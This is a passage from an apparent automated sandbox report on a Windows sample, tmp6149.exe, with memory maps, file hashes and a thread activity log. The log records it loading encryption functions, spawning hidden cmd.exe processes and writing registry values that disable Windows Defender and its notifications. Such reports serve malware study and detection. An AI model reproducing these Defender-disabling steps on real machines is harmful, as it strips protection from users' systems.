| private_0x0000000002f20000 | 0x02f20000 | 0x02f2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002f80000 | 0x02f80000 | 0x02f8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002fe0000 | 0x02fe0000 | 0x0305ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003070000 | 0x03070000 | 0x030effff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003150000 | 0x03150000 | 0x031cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003210000 | 0x03210000 | 0x0328ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000032d0000 | 0x032d0000 | 0x0334ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003350000 | 0x03350000 | 0x033cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000033e0000 | 0x033e0000 | 0x0345ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003460000 | 0x03460000 | 0x0355ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003590000 | 0x03590000 | 0x0360ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003630000 | 0x03630000 | 0x036affff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003720000 | 0x03720000 | 0x0379ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003890000 | 0x03890000 | 0x0390ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003950000 | 0x03950000 | 0x039cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000039d0000 | 0x039d0000 | 0x03a4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003a80000 | 0x03a80000 | 0x03afffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003b80000 | 0x03b80000 | 0x03bfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003c60000 | 0x03c60000 | 0x03cdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003ce0000 | 0x03ce0000 | 0x03edffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003f50000 | 0x03f50000 | 0x03fcffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004020000 | 0x04020000 | 0x0409ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004190000 | 0x04190000 | 0x0420ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004340000 | 0x04340000 | 0x043bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000043c0000 | 0x043c0000 | 0x0443ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000044f0000 | 0x044f0000 | 0x046effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000046f0000 | 0x046f0000 | 0x047effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000049a0000 | 0x049a0000 | 0x04a1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004af0000 | 0x04af0000 | 0x04b6ffff | Private Memory | rw |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| svchost.exe | 0xffc20000 | 0xffc2afff | Memory Mapped File | rwx |
|
|
|
- |
| qmgr.dll | 0x7feddf00000 | 0x7feddfd1fff | Memory Mapped File | rwx |
|
|
|
- |
| upnp.dll | 0x7fee2750000 | 0x7fee2794fff | Memory Mapped File | rwx |
|
|
|
- |
| ncprov.dll | 0x7fef31c0000 | 0x7fef31d5fff | Memory Mapped File | rwx |
|
|
|
- |
| tcpipcfg.dll | 0x7fef3730000 | 0x7fef3771fff | Memory Mapped File | rwx |
|
|
|
- |
| mprapi.dll | 0x7fef4dd0000 | 0x7fef4e09fff | Memory Mapped File | rwx |
|
|
|
- |
| bitsigd.dll | 0x7fef59a0000 | 0x7fef59b1fff | Memory Mapped File | rwx |
|
|
|
- |
| npmproxy.dll | 0x7fef59c0000 | 0x7fef59cbfff | Memory Mapped File | rwx |
|
|
|
- |
| wbemess.dll | 0x7fef5b20000 | 0x7fef5b9dfff | Memory Mapped File | rwx |
|
|
|
- |
| ncobjapi.dll | 0x7fef5ba0000 | 0x7fef5bb5fff | Memory Mapped File | rwx |
|
|
|
- |
| wmiprvsd.dll | 0x7fef5bc0000 | 0x7fef5c7bfff | Memory Mapped File | rwx |
|
|
|
- |
| repdrvfs.dll | 0x7fef5c80000 | 0x7fef5cf2fff | Memory Mapped File | rwx |
|
|
|
- |
| wmiutils.dll | 0x7fef5d00000 | 0x7fef5d25fff | Memory Mapped File | rwx |
|
|
|
- |
| hnetcfg.dll | 0x7fef5d30000 | 0x7fef5d9afff | Memory Mapped File | rwx |
|
|
|
- |
| resutils.dll | 0x7fef5da0000 | 0x7fef5db8fff | Memory Mapped File | rwx |
|
|
|
- |
| clusapi.dll | 0x7fef5dc0000 | 0x7fef5e0ffff | Memory Mapped File | rwx |
|
|
|
- |
| wbemsvc.dll | 0x7fef5e10000 | 0x7fef5e23fff | Memory Mapped File | rwx |
|
|
|
- |
| esscli.dll | 0x7fef5e30000 | 0x7fef5e9efff | Memory Mapped File | rwx |
|
|
|
- |
| wbemcore.dll | 0x7fef5ea0000 | 0x7fef5fcefff | Memory Mapped File | rwx |
|
|
|
- |
| nci.dll | 0x7fef5fd0000 | 0x7fef5fe9fff | Memory Mapped File | rwx |
|
|
|
- |
| netprofm.dll | 0x7fef5ff0000 | 0x7fef6063fff | Memory Mapped File | rwx |
|
|
|
- |
| netcfgx.dll | 0x7fef6070000 | 0x7fef60f3fff | Memory Mapped File | rwx |
|
|
|
- |
| browser.dll | 0x7fef6300000 | 0x7fef6324fff | Memory Mapped File | rwx |
|
|
|
- |
| srvsvc.dll | 0x7fef6330000 | 0x7fef636cfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdsapi.dll | 0x7fef6370000 | 0x7fef6396fff | Memory Mapped File | rwx |
|
|
|
- |
| fastprox.dll | 0x7fef63a0000 | 0x7fef6481fff | Memory Mapped File | rwx |
|
|
|
- |
| wdscore.dll | 0x7fef64d0000 | 0x7fef6516fff | Memory Mapped File | rwx |
|
|
|
- |
| sqmapi.dll | 0x7fef6520000 | 0x7fef6561fff | Memory Mapped File | rwx |
|
|
|
- |
| rtutils.dll | 0x7fef6570000 | 0x7fef6580fff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpsvc.dll | 0x7fef6590000 | 0x7fef6621fff | Memory Mapped File | rwx |
|
|
|
- |
| ssdpapi.dll | 0x7fef7030000 | 0x7fef7040fff | Memory Mapped File | rwx |
|
|
|
- |
| webio.dll | 0x7fef7190000 | 0x7fef71f3fff | Memory Mapped File | rwx |
|
|
|
- |
| winhttp.dll | 0x7fef7200000 | 0x7fef7270fff | Memory Mapped File | rwx |
|
|
|
- |
| vsstrace.dll | 0x7fef73c0000 | 0x7fef73d6fff | Memory Mapped File | rwx |
|
|
|
- |
| vssapi.dll | 0x7fef73e0000 | 0x7fef758ffff | Memory Mapped File | rwx |
|
|
|
- |
| tschannel.dll | 0x7fef8120000 | 0x7fef8128fff | Memory Mapped File | rwx |
|
|
|
- |
| rascfg.dll | 0x7fef8940000 | 0x7fef8959fff | Memory Mapped File | rwx |
|
|
|
- |
| actxprxy.dll | 0x7fef8f60000 | 0x7fef904dfff | Memory Mapped File | rwx |
|
|
|
- |
| ndiscapcfg.dll | 0x7fef9340000 | 0x7fef934efff | Memory Mapped File | rwx |
|
|
|
- |
| bitsperf.dll | 0x7fef9350000 | 0x7fef9359fff | Memory Mapped File | rwx |
|
|
|
- |
| taskcomp.dll | 0x7fef93c0000 | 0x7fef9436fff | Memory Mapped File | rwx |
|
|
|
- |
| ktmw32.dll | 0x7fef9440000 | 0x7fef9449fff | Memory Mapped File | rwx |
|
|
|
- |
|
For performance reasons, the remaining 226 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Process #7: tmp6149.exe
336
0
| Information | Value |
|---|---|
| ID | #7 |
| File Name | c:\users\aetadzjz\appdata\local\temp\tmp6149.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Temp\tmp6149.exe" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:43, Reason: Child Process |
| Unmonitor | End Time: 00:02:11, Reason: Self Terminated |
| Monitor Duration | 00:00:28 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x698 |
| Parent PID | 0xa80 (c:\windows\system32\windowspowershell\v1.0\powershell.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
5D0
0x
83C
0x
8C8
0x
8F4
0x
940
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rwx |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0028ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000290000 | 0x00290000 | 0x00293fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x002a0000 | 0x00306fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000310000 | 0x00310000 | 0x0032ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000330000 | 0x00330000 | 0x00336fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x003bffff | Private Memory | rw |
|
|
|
- |
| rsaenh.dll | 0x003c0000 | 0x003fbfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000003c0000 | 0x003c0000 | 0x003c1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x003d0fff | Private Memory | rwx |
|
|
|
- |
| imm32.dll | 0x003e0000 | 0x003fdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x003e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003f0000 | 0x003f0000 | 0x003f0fff | Private Memory | rw |
|
|
|
- |
| tmp6149.exe | 0x00400000 | 0x00487fff | Memory Mapped File | rwx |
|
|
|
|
| private_0x0000000000490000 | 0x00490000 | 0x004cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004d0000 | 0x004d0000 | 0x0050ffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000510000 | 0x00510000 | 0x0051ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000510000 | 0x00510000 | 0x00521fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000510000 | 0x00510000 | 0x00510fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000520000 | 0x00520000 | 0x00520fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000530000 | 0x00530000 | 0x0062ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000630000 | 0x00630000 | 0x0072ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x00730000 | 0x009fefff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000a00000 | 0x00a00000 | 0x00df2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000e00000 | 0x00e00000 | 0x00ffffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001000000 | 0x01000000 | 0x01187fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001190000 | 0x01190000 | 0x01310fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001320000 | 0x01320000 | 0x0271ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002720000 | 0x02720000 | 0x02b2ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000002720000 | 0x02720000 | 0x0289ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002720000 | 0x02720000 | 0x027fefff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002800000 | 0x02800000 | 0x02800fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002810000 | 0x02810000 | 0x02810fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002820000 | 0x02820000 | 0x02820fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002860000 | 0x02860000 | 0x0289ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000028a0000 | 0x028a0000 | 0x028dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000028e0000 | 0x028e0000 | 0x02adffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002ae0000 | 0x02ae0000 | 0x02b1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002b20000 | 0x02b20000 | 0x02d1ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002b30000 | 0x02b30000 | 0x02f3ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000002d20000 | 0x02d20000 | 0x02d5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002d60000 | 0x02d60000 | 0x02f5ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002f40000 | 0x02f40000 | 0x02f51fff | Pagefile Backed Memory | rw |
|
|
|
- |
| cmlua.dll | 0x74660000 | 0x7466bfff | Memory Mapped File | rwx |
|
|
|
- |
| comsvcs.dll | 0x75070000 | 0x751a5fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x75210000 | 0x7528ffff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752a0000 | 0x752a7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x752b0000 | 0x7530bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75310000 | 0x7534efff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrtremote.dll | 0x75380000 | 0x7538dfff | Memory Mapped File | rwx |
|
|
|
- |
| cmutil.dll | 0x75390000 | 0x7539dfff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x753b0000 | 0x753b8fff | Memory Mapped File | rwx |
|
|
|
- |
| atl.dll | 0x75490000 | 0x754a3fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x754c0000 | 0x754d6fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x754e0000 | 0x7551afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x75520000 | 0x75535fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75950000 | 0x7595afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75970000 | 0x7597bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75980000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759e0000 | 0x759f8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75a10000 | 0x75abbfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75c00000 | 0x75c5ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x75c60000 | 0x75cb6fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x75cf0000 | 0x75e4bfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75e50000 | 0x75f1bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75f40000 | 0x75f85fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75fa0000 | 0x7603cfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x76040000 | 0x760c2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x760d0000 | 0x761bffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76220000 | 0x7632ffff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x76330000 | 0x7644cfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76490000 | 0x7652ffff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x76720000 | 0x767aefff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76a70000 | 0x76afffff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x76b00000 | 0x77749fff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x77800000 | 0x7780bfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77810000 | 0x77819fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77820000 | 0x7791ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000077a20000 | 0x77a20000 | 0x77b19fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000077b20000 | 0x77b20000 | 0x77c3efff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77e20000 | 0x77f9ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Users\aETAdzjz\AppData\Local\Temp\tmp6149.exe | 510.50 KB |
MD5:
94df3603fba467e0fff637c55c8b6d1b
SHA1: 93f6cd1834a402f78497d2978d3a3a58ec3bfd66 SHA256: 4f9eb9ef4ef021679de344f227bc6e162f1e5bcc6950d63ee870718380c58016 SSDeep: 12288:mw4zMV6fcJUCT+ZiO852/Ico+/fT3aBtYg:P8fcJUCTjOy2eGT36tx |
|
|
| C:\Users\aETAdzjz\AppData\Local\Temp\tmp6149.exe | 0.00 KB |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 SSDeep: 3:: |
|
|
Modified Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\aetadzjz\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-2345716840-1148442690-1481144037-1000\8b5db95fe05dd9b00e55df22e826ce4d_500c0908-381e-49dc-a6a0-1a800e9a56e0 | 1.02 KB |
MD5:
da70750b528b4d52fb0bf775d6f5c6f2
SHA1: 2df212c8490799f3f07ddc3b4af9ed4c5ea0b3be SHA256: 93ae9406a7aa24438df790e980d86dbff3de11200c79ed935c3d9f66492fd7f0 SSDeep: 24:NlzKf5b6U4Q7WebZY7e5n0DfFXVauU7IFFF4ZfpjU:n8b6U4sFEeOFXU7+34o |
|
|
| c:\users\aetadzjz\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-2345716840-1148442690-1481144037-1000\8b5db95fe05dd9b00e55df22e826ce4d_500c0908-381e-49dc-a6a0-1a800e9a56e0 | 1.02 KB |
MD5:
3936b8254a3f80e60c3af26a41ed3e9f
SHA1: 089d63aa68f44bba7984217ecff5cbef1bcd3baa SHA256: 2029500e3c3a8c6a36b285b626b0b8072dc4647d9c18a3da10e8e40771c6c473 SSDeep: 24:NlzKf5b6U4KrIjGoHyhYg9s2kqbycVg44d5mU:n8b6U4OIZHy+g9s/u044KU |
|
|
Threads
Thread 0x5d0
116
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = System Time, time = 2018-12-06 22:27:32 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 161507 |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-use_fc_key |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-use_fc_key |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-sjlj_once |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-sjlj_once |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-once_global_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-once_global_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-once_obj_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-once_obj_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-mutex_global_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-mutex_global_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-_pthread_tls_once_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-_pthread_tls_once_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-_pthread_tls_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-_pthread_tls_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-mtx_pthr_locked_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-mtx_pthr_locked_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-mutex_global_static_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-mutex_global_static_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-mxattr_recursive_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-mxattr_recursive_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-pthr_root_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-pthr_root_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-idListCnt_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-idListCnt_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-idListMax_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-idListMax_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-idList_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-idList_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-idListNextId_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-idListNextId_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-fc_key |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-fc_key |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-_pthread_key_lock_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-_pthread_key_lock_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-_pthread_cancelling_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-_pthread_cancelling_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-cond_locked_shmem_rwlock |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-cond_locked_shmem_rwlock |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-rwl_global_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-rwl_global_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-_pthread_key_sch_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-_pthread_key_sch_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-_pthread_key_max_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-_pthread_key_max_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-_pthread_key_dest_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-_pthread_key_dest_shmem |
|
1 | |
| System | Sleep | duration = 15000 milliseconds (15.000 seconds) |
|
1 | |
| Module | Load | module_name = advapi32.dll, base_address = 0x76490000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextA, address_out = 0x764991dd |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x7649c532 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x764b779b |
|
1 | |
| Module | Load | module_name = shell32.dll, base_address = 0x76b00000 |
|
1 | |
| Module | Load | module_name = ntdll.dll, base_address = 0x77e20000 |
|
1 | |
| Module | Load | module_name = shlwapi.dll, base_address = 0x75c60000 |
|
1 | |
| Module | Load | module_name = advapi32.dll, base_address = 0x76490000 |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x75cf0000 |
|
1 | |
| Module | Get Handle | module_name = c:\users\aetadzjz\appdata\local\temp\tmp6149.exe, base_address = 0x400000 |
|
249 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| Service | Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Service | Open | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Service | Get Info | service_name = WinDefend |
|
1 | |
| Process | Create | process_name = C:\Windows\system32\cmd.exe, os_pid = 0x8a4, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Process | Create | process_name = C:\Windows\system32\cmd.exe, os_pid = 0x8b0, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Process | Create | process_name = C:\Windows\system32\cmd.exe, os_pid = 0x894, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender |
|
1 | |
| Registry | Write Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender, value_name = DisableAntiSpyware, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications |
|
1 | |
| Registry | Write Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications, value_name = DisableNotifications, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Service | Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Service | Open | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Service | Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Service | Open | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\local\temp\tmp6149.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Temp\tmp6149.exe, size = 260 |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Local\Temp\FAQ, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Create Directory | C:\Users\aETAdzjz\AppData\Roaming\WinDefrag |
|
1 | |
